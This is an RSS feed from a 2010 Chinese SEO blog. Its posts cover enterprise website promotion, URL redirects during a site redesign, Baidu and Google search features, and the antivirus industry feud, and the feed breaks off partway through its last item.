<?xml version='1.0' encoding='gb2312'?>
<rss version="2.0">
<channel>
<title>飞翔的猪圈</title>
<description>网站优化—关注搜索引擎优化，网站程序优化以及网站安全</description>
<link>http://www.001pp.com/</link>
<language>zh-cn</language>
<generator>www.001pp.com</generator>
<ttl>60</ttl>

<item><title><![CDATA[如何推广企业网站，企业网站推广的三大特性与方法]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/ruhetuiguangqiyewangzhan17661.html]]></link><description><![CDATA[<p>如何推广企业网站是广大企业主以及企业网站网管关心的问题。企业网站的推广目标有其自身的特点，具备以下性质：</p>
<p>1、目标的精准</p>
<p>对于企业网站而言，经费的限制以及对效果的渴求，造成了企业网站推广的目标比其他非企业网站更注重精准性。因此在推广企业网站的时候，一些获得广泛流量的手法，例如网址站广告，追逐热门关键词等方式是不适用这样的精准要求的。而是需要使用seo/sem/ppc 等方式。</p>
<p><img width="450" height="315" alt="" src="/uploadfiles/2010-7/20100705322581.jpg" /></p>
<p>2、品牌的传达</p>
<p>对于大部分企业而言，除了最关注的销量以外，对自身品牌的建设也日益重视，品牌是企业的信誉、品质、技术、服务等诸多方面的综合体现.成功的品牌战略意味着商品的竞争优势和市场强大占有率,同时也是企业与厂商市场份额、丰厚利润的体现，而对于网络媒体属性的认同，是的企业主对使用网站来进行品牌传达情有独钟，而与传统的传播方式不同，网络的品牌传播有着表现更丰富，互动更深入，受众更精确的特点。</p>
<p><img width="340" height="255" alt="" src="/uploadfiles/2010-7/20100705261221.jpg" /></p>
<p>3、方法的正当</p>
<p>目前互联网网站存在许多不正当的推广方式，仅以seo而言，黑帽手法就层出不穷，从最基础的文本堆砌到现在的百度点击，从博客群发到黑链链接买卖，这些手法对于企业网站推广而言，由于本身的&ldquo;不正当&rdquo;性，一般是不推荐采用的，如第二点所言，网站不仅仅是企业的一个宣传渠道，还承担着企业形象传达的作用，这些不正当的推广方式可能会给企业带来不利的影响，同时，最重要的是，这些方法之所以不正当，是因为它随时可能带来不良的效果，而对于企业网站，这种不良的效果会直接扼杀让以前所做的推广，这一点才是最不可容忍的，因此，企业网站的推广还应该注重方法的正当。</p>
<p><img alt="" src="/uploadfiles/2010-7/20100705232787.jpg" /></p>
<p>那针对这样的推广目标，如何推广企业网站呢？这里总结出企业网站推广的三大方法，仅供参考。</p>
<p>1、seo</p>
<p>seo全称为搜索引擎优化，通过对内容以及链接的建设，让网站在搜索引擎获得更好的排名。对于企业网站推广而言，这一方法的优点是投入少，效果好，缺点在于风险较大，且运作周期较长。通常使用seo获得排名，所花费的代价是使用百度推广获得排名的代价的十几分之一，甚至几十分之一，但是，seo是依附于搜索引擎而产生的，搜索引擎的变动会让seo产生一定的风险，例如排名不稳定等情况。但这样的风险可以通过正规手法操作或者sem进行规避。</p>
<p>2、广告</p>
<p>2、1 sem/cps</p>
<p>广告是一种很传统的推广手段，而在企业网站推广中，我将sem/cps列为首选的广告方式。sem意为&ldquo;搜索引擎营销&rdquo;，和seo类似，简单地说，就是把钱给搜索引擎，然后在用户搜索某个相关关键词的时候展示企业网站的广告。而cps意思是按销售付费的广告，广告费不是直接给媒体，而是根据广告媒体帮企业销售了多少订单给予提成的。它们的优势在于效果可控，在广告界有这么一句名言&quot;我知道我的广告费有50%是浪费的，但我不知道是哪50%在浪费&quot;，通过现今的网站分析技术，可以检测到使用sem/cps投放了多少钱广告，获得了多少个订单。当然，这种方法也存在一定的不足，例如需要一定的资金门槛，并且对于执行广告计划的操作者有一定的能力要求。</p>
<p>2、2 专业化门户网站。</p>
<p>除了sem/cps这样的精准推广以外，还可以通过投放专业化门户网站来进行一个相对比较精准的推广，浏览这些专业网站的群体分成两种，消费者和专业人士，对于消费者的推广可以提高企业网站的销售率，而对于专业人士的推广则起到了品牌传播的作用，符合了企业网站推广的前2大原则。</p>
<p>2、3 全国性网站品牌广告投放。</p>
<p>对于较大的企业而言，选择一些全国性的网站进行品牌广告投放，也是很好的企业网站推广方式，但是这对于资金门槛要求较高，并且，这样的推广方式主要是为了进行品牌形象的传达。</p>
<p>3、社会化媒体营销</p>
<p>3、1 博客营销</p>
<p>什么是博客营销呢？博客营销的概念可以说并没有严格的定义，简单来说，就是利用博客这种网络应用形式开展网络营销。这种推广方式优点在于门槛较低，成本低廉，只需要人工成本，但是缺点在于，直接获得宣传效果较差，主要是通过博客营销来辅助进行品牌形象推广以及舆情监控。</p>
<p>3、2 软文营销</p>
<p>软文炒作是生命力最强的一种广告形式.也是很有技巧性的广告形式,软文是相对于硬性广告而言，由企业的市场策划人员或广告公司的文案人员来负责撰写的&ldquo;文字广告&rdquo;。与硬广告相比，软文之所以叫做软文，精妙之处就在于一个&ldquo;软&rdquo;字，好似棉里藏针，收而不露，克敌于无形。等到你发现这是一篇软文的时候，你已经冷不盯的掉入了被精心设计过的&ldquo;软文广告&rdquo;陷阱。它追求的是一种春风化雨、润物无声的传播效果。如果说硬广告是外家的少林工夫；那么，软文则是绵里藏针、以柔克刚的武当拳法，软硬兼施、内外兼修，才是最有力的营销手段。这种推广手段的优点是广告受众接受性较强，同时对于品牌形象的传播有较好的效果，缺点在于需要一定的媒体资源，并且直接推广的效果较差。</p>
<p>3、3 舆情监控</p>
<p>之所以把舆情监控作为一种推广手段，是由于舆情监控对于企业网站推广效果有着极其重要的作用，舆情即舆论情况，也就是舆论对企业的报道是正面还是负面的，例如，在搜索引擎搜索某品牌，如果出来的都是负面信息，那么企业网站推广做得再好也没用，绝大部分的消费者在网上进行消费都会关注企业在网上的口碑情况，如果企业在网站推广的时候没有注意进行舆情监控，那么会让企业网站的推广事倍功半。</p>
<p>以上是有关如何推广企业网站的三大特性和方法，仅供广大企业主和网管参考，也欢迎广大企业主和网管和我交流。联系邮件 admin@001pp.com qq:65499273</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2010-07-05 23:01:03]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[想了解下我的博客读者，送出qq微博邀请码2枚]]></title><link><![CDATA[http://www.001pp.com/it/tengxunweiboyaoqingma11247.html]]></link><description><![CDATA[<p>不知道常浏览我博客的朋友有没有我不认识的。。送2枚微博邀请码试试，</p>
<p>其实。。到这个时候，基本上是送不出去了&hellip;&hellip;</p>
<p>
<p><u><font class="Apple-style-span" color="#0000EE">http://t.qq.com/invite/418fbbea1ed95bd6e893</font></u></p>
<p><a href="http://t.qq.com/invite/1e309650694fa3539543">http://t.qq.com/invite/1e309650694fa3539543</a>&nbsp;</p>
<p><a href="http://t.qq.com/invite/483e958f344690ef3e81">http://t.qq.com/invite/483e958f344690ef3e81</a></p>
<p><a href="http://t.qq.com/invite/771ddcc6adf9415c5f07">http://t.qq.com/invite/771ddcc6adf9415c5f07</a></p>
<p><a href="http://t.qq.com/invite/6f9a082565b5d810a171">http://t.qq.com/invite/6f9a082565b5d810a171</a></p>
<p><font class="Apple-style-span" color="#0000EE"><u>
<p>&nbsp;</p>
</u></font></p>
</p>
<p>&nbsp;</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2010-07-03 22:38:57]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/it/"><![CDATA[IT]]></category><source url="http://www.001pp.com/asp/rss.asp?id=136"><![CDATA[IT]]></source></item><item><title><![CDATA[杀毒软件业口水战]]></title><link><![CDATA[http://www.001pp.com/it/shaduruanjiankoushuizhan13323.html]]></link><description><![CDATA[<p>这场杀毒软件业口水战的起因也不复杂，金山网镖，可以让遨游火狐甚至ie变成&ldquo;安全浏览器&rdquo;，360安全卫士为了保证360安全浏览器独占&ldquo;安全浏览器&rdquo;的卖点，强制卸载金山网镖，金山不甘受辱发声明谴责，结果流氓大佬周鸿祎借助时下最火热的微博东风，在微博以娴熟的骂人技巧狠狠地阴了金山一道，金山当日市值蒸发一亿，适时恰逢可牛免费杀毒发布，依照惯例360安全卫生又继续干掉了可牛，结果可牛也加入了这场杀毒软件口水战，这情节到这边还不止，大概周总觉得三方斗地主不好玩，要四个人打麻将才过瘾，在站长大会上又宣称，没有360安全卫士就没有卡巴斯基今天，搞得一向低调的卡巴中国区总裁也出来打麻将，一场轰轰烈烈的杀毒软件业口水战让媒体观众大过眼瘾。</p>
<p>在这场不怎么光彩的口水战中，周鸿祎的表现极为出彩，首先借助了近期各大门户都在推微博的东风，把微博当做自己的主场，各大门户为了推广微博，为了提供了大量的版面宣传，相比之下，金山仍然使用传统的发新闻稿的形式，不论从内容还是覆盖面，都不及周总的微博营销强大。</p>
<p>在文字方面，周总深得骂人精髓，含沙射影血口喷人偷换概念无中生有，加上高举免费大旗以免费和微点事件为道德制高点，那真是字字诛心，骂得金山毫无还手之力只能打悲情牌。</p>
<p>至于说，在传统口水战里面，发枪稿雇水军刷投票这类的手段，本次360杀毒口水战中倒是不多了。即便是这种传统的公关手段，360也完胜金山，金山还得背个操纵媒体的罪名，高。。。对周总高山仰止。。pfpf。</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2010-06-04 23:28:21]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/it/"><![CDATA[IT]]></category><source url="http://www.001pp.com/asp/rss.asp?id=136"><![CDATA[IT]]></source></item><item><title><![CDATA[网站改版的seo网址规范化问题]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/wangzhangaibanseo10343.html]]></link><description><![CDATA[<p>seo运营群54338195的网友发邮件问了下面这个关于网站改版后，seo方面的网址规范化问题&nbsp;</p>
<blockquote>
<p>我有个网站，<a href="http://www.xxxx.com">www.001pp.com</a>,由于排名不好、界面不友好等诸多方面原因想进行改版，为了以后有更好的拓展性。<br />
想从ASP的转到DEDECMS的<br />
现在面临的问题是<br />
URL不能保持不变。这是非常非常头疼的问题，找了很多人都解决不了<br />
我在想<br />
原有的文章我也转成新的文章，但我不删除原有文章，然后用rebots禁止收录旧有的文章。这样的话会不会影响旧有文章的排名呢？<br />
会不会比完全做一个新站好一点呢？&nbsp;</p>
</blockquote>
<p>从seo的角度考虑网站改版，最大的问题莫过于网址无法迁移。通常情况下，网站改版有几种处理方式。</p>
<p>1、直接删除旧版 这一处理的话，太过粗暴了，很有可能你改版后很长一段时间都无法从搜索引擎获得流量</p>
<p>2、保留旧版一段时间后删除 这是一种比较容易实现的操作，效果也差强人意，能保留很大一部分的流量，对于技术实力有限的站长，不失于是一种不错的选择。</p>
<p>3、旧版做url rewrite到新版 这是一种效果较好的办法，改版所产生的印象基本会忽略不计，但是，这在后期，将会造成页面重复问题，对于每个内容页，都有一个新版页面和旧版页面，容易降低权重，也不推荐。</p>
<p>4、采用网址规范化标签，<font size="2">rel=&ldquo;<em>canonical</em>&rdquo;,如果要将旧页面<a href="http://www.001pp.com/pr.asp">http://www.001pp.com/pr.asp</a>迁移到 <a href="http://www.001pp.com/">http://www.001pp.com/</a>,那么，要在在旧页面的head标签之内，写以下代码，&lt;link rel=&quot;canonical&quot; href=&ldquo;<a href="http://www.001pp.com/">http://www.001pp.com/</a>&ldquo;/&gt; 不过仍然不是很推荐这一做法，目前仅有google表示明确支持这一标签。</font></p>
<p>5、旧版301重定向重写到新版。</p>
<p>这是google所推荐的办法，然而在技术实现上也有一定的难度。以上面提问的朋友所遇到的问题为例，整站都是asp的，那么，整站都会对应一个新网址的url，原本的栏目地址是 http://www.001pp.com/default.asp?cateID=8 现在要改成 http://www.001pp.com/index.php?cateid=8 ，那么在default.asp做好<a href="http://www.001pp.com/chengxuyouhua/301tiaozhuan33.html">301重定向</a>就可以了。&nbsp;这是动态页面的处理。,301跳转的方法，我在&ldquo;<a href="http://www.001pp.com/chengxuyouhua/301tiaozhuan33.html" target="_blank"><span style="font-size: x-small">正确设置<em>301</em>跳转</span></a>&rdquo;一文中有提及，当然，要保持url不变也可以，用iis rewrite伪静态规则，将所有对旧地址的访问，重写到新地址去。</p>
<p>而对于原本静态页面的处理，最好能沿用原来的地址 例如，原来是 http://www.001pp.com/article/ask/6392.html，现在换成了dedecms，可能要换成直接 http://www.001pp.com/ask/6392.html 这样的处理。我个人的建议是，写一段iis rewrite伪静态规则，将所有对http://www.001pp.com/article/ask/6392.html的访问，指向 http://www.001pp.com/ask/6392.html 这个新的页面地址。这样就可以做到，旧版的静态地址仍然得到沿用。</p>
<p>如果说，由于网站结构的考虑，一定要使用新的静态地址，那么，仍然需要应用到iis rewrite伪静态规则，将所有对旧地址的访问，用iis rewrite重写，以301的方式重写到新地址。</p>
<p>为了避免网站改版所带来的，url迁移问题，建议在起初应该规划好网站结构，尽量不要出现 .asp 。php之类的动态后缀，而应该尽量采用二级域名，子目录，静态页面地址，这样的链接形式，以避免以后出现的网址规范化问题。</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2010-04-28 20:14:54]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[百度电视台—奇艺视频观感]]></title><link><![CDATA[http://www.001pp.com/it/baidudianshitai10200.html]]></link><description><![CDATA[<p>某tx在找&ldquo;百度电视台&rdquo;，让我困惑了一会儿，貌似并没有听说百度涉足传统电视媒体市场的事情&hellip;&hellip;后来想起了奇艺<a href="http://www.qiyi.com/">http://www.qiyi.com/</a> 作为百度旗下的视频网站，奇艺不就是百度台么，顺便去溜了溜。</p>
<p>随手看了下奇艺的代码，从meta的写法看。。。做视频的兄弟们遭殃了</p>
<blockquote>
<pre id="line1">
&lt;<span class="start-tag">title</span>&gt;奇艺首页-<span style="color: #ff0000">网络视频,高清视频,在线视频观看,视频搜索</span>&lt;/<span class="end-tag">title</span>&gt;
&lt;<span class="start-tag">meta</span><span class="attribute-name"> http-equiv</span>=<span class="attribute-value">&quot;keywords&quot; </span><span class="attribute-name">content</span>=<span class="attribute-value">&quot;高清视频,正版视频,热门电影,经典大片,热播电视剧,综艺,动漫,纪录片,音乐,MV,在线观看,免费观看,网络视频,视频搜索,在线视频,点播&quot;</span>&gt;
&lt;<span class="start-tag">meta</span><span class="attribute-name"> http-equiv</span>=<span class="attribute-value">&quot;description&quot; </span><span class="attribute-name">content</span>=<span class="attribute-value">&quot;奇艺（QIYI.COM）是最具价值的网络视频播放平台；是国内首家专注于提供免费、高清网络视频服务的大型专业网站。奇艺影视内容丰富多元，涵盖电影、电视剧、综艺、纪录片、动画片等热门剧目；视频播放清晰流畅，操作界面简单友好，真正为用户带来&ldquo;悦享品质&rdquo;的观映体验。&quot;</span>&gt;

</pre>
</blockquote>
<p>相信很快，红色的那几个热门词将出现奇艺的身影。</p>
<p>同其他56，youku之类的站点相比，奇艺的版面显得比较大气&mdash;&mdash;也就是比较空旷，原因如图：</p>
<p><img width="526" height="111" alt="" src="/uploadfiles/2010-4/2010427516536.jpg" /></p>
<p><img width="570" height="88" alt="" src="/uploadfiles/2010-4/2010427909924.jpg" /></p>
<p>奇艺上线的页面数量以百计，这点很令人诧异，不是号称<a href="http://www.001pp.com/info/2010-2/4897.html">买下了几千部视频么</a>&nbsp;，就算说测试，也早就<a href="http://www.001pp.com/info/2010-2/4915.html">磨磨唧唧地测试了好久</a>了，搞到现在效率也是在低得惊人，不知道百度这<a href="http://www.001pp.com/info/2010-3/5351.html">5000w美元投资</a>会不会所托非人。</p>
<p>作为主打高清正版的奇艺，画面质量还是不错的，不过令人奇怪的是，它留这两个空位是干啥的？</p>
<p><img width="498" height="254" alt="" src="/uploadfiles/2010-4/2010427946561.jpg" /></p>
<p>再看下页内代码，只看meta就知道没有考虑seo</p>
<blockquote>
<pre id="line1">
&lt;<span class="start-tag">meta</span><span class="attribute-name"> name</span>=<span class="attribute-value">&quot;keywords&quot; </span><span class="attribute-name">content</span>=<span class="attribute-value">&quot;&quot; </span><span class="error"><span class="attribute-name">/</span></span>&gt;  
&lt;<span class="start-tag">meta</span><span class="attribute-name"> name</span>=<span class="attribute-value">&quot;description&quot; </span><span class="attribute-name">content</span>=<span class="attribute-value">&quot;&quot; </span><span class="error"><span class="attribute-name">/</span></span>&gt;
&hellip;&hellip;
<pre id="line34">
&lt;<span class="start-tag">title</span>&gt;正版高清视频在线观看-奇艺&lt;/<span class="end-tag">title</span>&gt;
</pre>
</pre>
</blockquote>
<p>&nbsp;看来，目前的奇艺，与其说是正式上线，不如说是一个公测版的视频网站。</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2010-04-27 20:46:09]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/it/"><![CDATA[IT]]></category><source url="http://www.001pp.com/asp/rss.asp?id=136"><![CDATA[IT]]></source></item><item><title><![CDATA[百度实时搜索水准略有提升]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/baidushishisousuo10118.html]]></link><description><![CDATA[<p>虽然很遗憾，不过还是必须承认事实，百度实时搜索的水准略有提升，快速收录的网站从原来的部分高质量高权重的站点扩大到一部分原创性较强的个人博客。笔者在2010-4-26日21：23分发布了&ldquo;<a href="http://www.001pp.com/sousuoyinqingyouhua/googlewenda10114.html">Google小范围测试&ldquo;问题解答&rdquo;问答网站搜索</a>&rdquo;一文，几分钟后即被百度收录，如下图：</p>
<p><img width="377" height="93" alt="" src="/uploadfiles/2010-4/2010426692607.jpg" /></p>
<p><img width="565" height="80" alt="" src="/uploadfiles/2010-4/2010426026719.jpg" /></p>
<p>google虽然也很快收录了本文，但是结果却并非本站，而是在10分钟在艾瑞发布的文章。相比之下，google仍然谨慎地只对部分高权重网站应用快速索引。</p>
<p><img width="481" height="96" alt="" src="/uploadfiles/2010-4/2010426891181.jpg" /></p>
<p>当然，个别网站的现象得到的结论只能是推断，也有其他可能，例如，本站被google降权等情况，还需继续观察</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2010-04-26 21:56:34]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[Google小范围测试“问题解答”问答网站搜索]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/googlewenda10114.html]]></link><description><![CDATA[<p>从搜索请求中，百度发现有很多人需要的不是搜索结果，而是问题解答，于是百度推出了百度知道，把流量攥在自己手上，从站长口中再夺下了一分市场，而google则不断地索引百度知道的内容，并在这几天为日见增多的问答类网站专门创建了一个名为&ldquo;问题解答&rdquo;的问答网站搜索。如下图</p>
<p><img style="width: 628px; height: 357px" alt="" src="/uploadfiles/2010-4/2010426477464.jpg" /></p>
<p>对于百度和google满足用户获取答案的方式优劣，不予置先评，Google问题解答搜索的推出，一方面体现了google在网页分析上日趋成熟的的技术，另一方面，对于只需要答案的用户，从问答网站源直接抓取的答案将以特殊的形式显示在serp上，也大大地提升了用户的体验，此外，测试发现，问答类的搜索结果，不像开放的百度，只收录自家百度知道的结果，收录的内容包括了雅虎知识堂在内的多家网站，很难说这一方式比单纯的百度知道结果更好还是更糟糕&mdash;&mdash;这取决于索引的有效程度。</p>
<p><img alt="" src="/uploadfiles/2010-4/2010426686543.jpg" /></p>
<p>目前没有在所有的用户serp上显示&ldquo;问题解答&rdquo;的链接，google这一产品的推出，是反击阿拉丁平台的重要一拳，究竟是百度主导下，封闭的阿拉丁生态圈更好，还是google开放的态度更能赢得用户？拭目以待吧，当然，和广大站长一样，我肯定希望是后者获得胜利，被百度帝国把持的互联网绝对是可怕的。</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2010-04-26 21:23:20]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[百度证实200 0 64HTTP状态码与抓取行为无关]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/baidu200 0 6410007.html]]></link><description><![CDATA[<p>被一干外行吹捧甚久，且一直众说纷芸被说得神乎其神，号称站长日志杀手的&ldquo;200 0 64&rdquo;状态码现象，1小时前得到了<a target="_blank" href="http://tieba.baidu.com/club/9374916/p/5361544">百度站长俱乐部ｌｅｅ的明确回复</a>，证实200 0 64HTTP状态码与抓取行为无关，不想说啥了，贴出zac和lee的问答。建议各位站长用<a target="_blank" href="http://www.google.com.hk/search?hl=zh-CN&amp;newwindow=1&amp;safe=strict&amp;rlz=1T4GGLL_zh-CNCN365CN365&amp;q=200%200%2064%E4%BB%A3%E7%A0%81&amp;um=1&amp;ie=UTF-8&amp;tbo=u&amp;tbs=blg:1&amp;source=og&amp;sa=N&amp;tab=wb">google博客搜索</a>搜索下 200 0 64状态码，了解下seo届目前有多少伪专家。</p>
<p>zac提问：百度蜘蛛访问后返回的HTTP状态码为200 0 64与200 0 0的区别？是否和服务器开启gzip压缩有关？我开启后感觉百度蜘蛛访问后返回的HTTP状态码均为200 0 64。</p>
<p>lee回答：我注意到普通用户和其他搜索引擎蜘蛛程序的抓取，也会有相同的现象，这应该是服务请求处理失败或者iis日志记录出错。<br />
一直收集不到能对应到具体站点的相关log，我<span style="color: #ff0000">们也无法确定出现这种状态代码时是否会影响抓取，但可以确定和Baisuspider的抓取行为无关。<br />
</span>建议检查一下iis配置和自己网站的程序有无问题。</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2010-04-23 14:17:48]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[百度地图api悄然上线]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/baidudituapi10006.html]]></link><description><![CDATA[<p>4月23日中午得到的消息，百度推出了地图api产品<a href="http://openapi.baidu.com/map/">http://openapi.baidu.com/map/</a>&nbsp;，粗看了一下，文档十分齐全，但是，和google相比，示例较少，此外，在地图api的首页，没有对于百度地图api特性的介绍，即便是作为开发人员，看这些乏味的技术文档也很难有将原本基于google map api的应用迁移到百度的欲望。</p>
<p>百度地图api的推出，还是具有不少正面意义的，首先，与最近百度站长俱乐部上线，百度站长平台等等措施相辉映，表达百度一种开放的态度，其次，基于地图应用的应用市场已经越来越大，百度地图api这一战略性产品的推出，有助于百度在这一领域的发展，此外，时机上也抓住了google退出大陆这一时间点，个中不乏抢占google地图的战略意图。</p>
<p>不过，百度地图api要真正替代原google地图的行业地位，还有一段很长的路要走，这取决于百度的开放态度能持续多久，会不会一如其他产品一样虎头蛇尾，而且，地图api这一产品本身能否超越google？让我们拭目以待</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2010-04-23 13:58:10]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[认领qq邮箱博客订阅]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/zenmerenlingqqboke9136.html]]></link><description><![CDATA[<p>qq邮箱认领博客功能退出很久了，一直都没有认领自己的博客，今天顺手认领了一下，同时把怎么认领qq博客的教程也顺便贴一下，首先，点击qq邮箱的阅读空间，点击博客中的&ldquo;我要认领博客&rdquo;链接，如图1</p>
<p><img alt="" width="557" height="262" src="/uploadfiles/2010-4/201048998483.jpg" /></p>
<p>接着需要你输入博客地址，如果识别不出来，你可以输入rss地址，如图2：</p>
<p><img alt="" width="515" height="259" src="/uploadfiles/2010-4/201048800204.jpg" /></p>
<p>输入完毕后，qq要求你在博客上发表一篇文章，包含验证字符，如图三</p>
<p><img alt="" src="/uploadfiles/2010-4/201048635681.jpg" /></p>
<p>update：认领成功</p>
<p><img width="475" height="199" alt="" src="/uploadfiles/2010-4/201049599484.jpg" /></p>
<p>将这一个个验证字符&ldquo;QQREADER4B81A5FEF88A0CAF&rdquo;包含到你的博客的一篇文章里，就像我现在做的这样，然后填写验证码提交认领博客申请，就可以了。如图4，完成了qq邮箱认领博客的整个程序，提示&ldquo;您的申请已经成功提交，认领结果请留意我们的通知邮件。在认领成功之前请不要将您博客上的验证代码删除。&rdquo;</p>
<p><img alt="" width="521" height="213" src="/uploadfiles/2010-4/201048750015.jpg" /></p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2010-04-08 19:47:32]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[pr批量查询工具上线]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/piliangchaxunpr8960.html]]></link><description><![CDATA[<p>对于手上有多个站点的站长以及网络公司，需要批量查询pr的问题肯定有很多朋友遇到，特别是pr更新时期，一个个查实在费劲，而很多市面上已有的pr值批量查询又不是那么好实用，要么是不支持在线查询，要么是输入很麻烦。为此，001pp.com特地推出了<a href="http://www.001pp.com/pr.asp">pr批量查询工具</a>&nbsp;<a href="http://www.001pp.com/pr.asp">http://www.001pp.com/pr.asp</a>,只要你把网站粘贴进去，自动批量识别网址，批量查询，应该说会方便了不少。截图如下：</p>
<p style="text-align: center"><img width="615" height="314" alt="" src="/uploadfiles/2010-4/201046255479.jpg" /></p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2010-04-06 10:40:16]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[百度疑似出现大规模故障，大量网站收录减少]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/baidushoulujianshao8600.html]]></link><description><![CDATA[<p style="text-align: center"><img alt="" width="226" height="107" 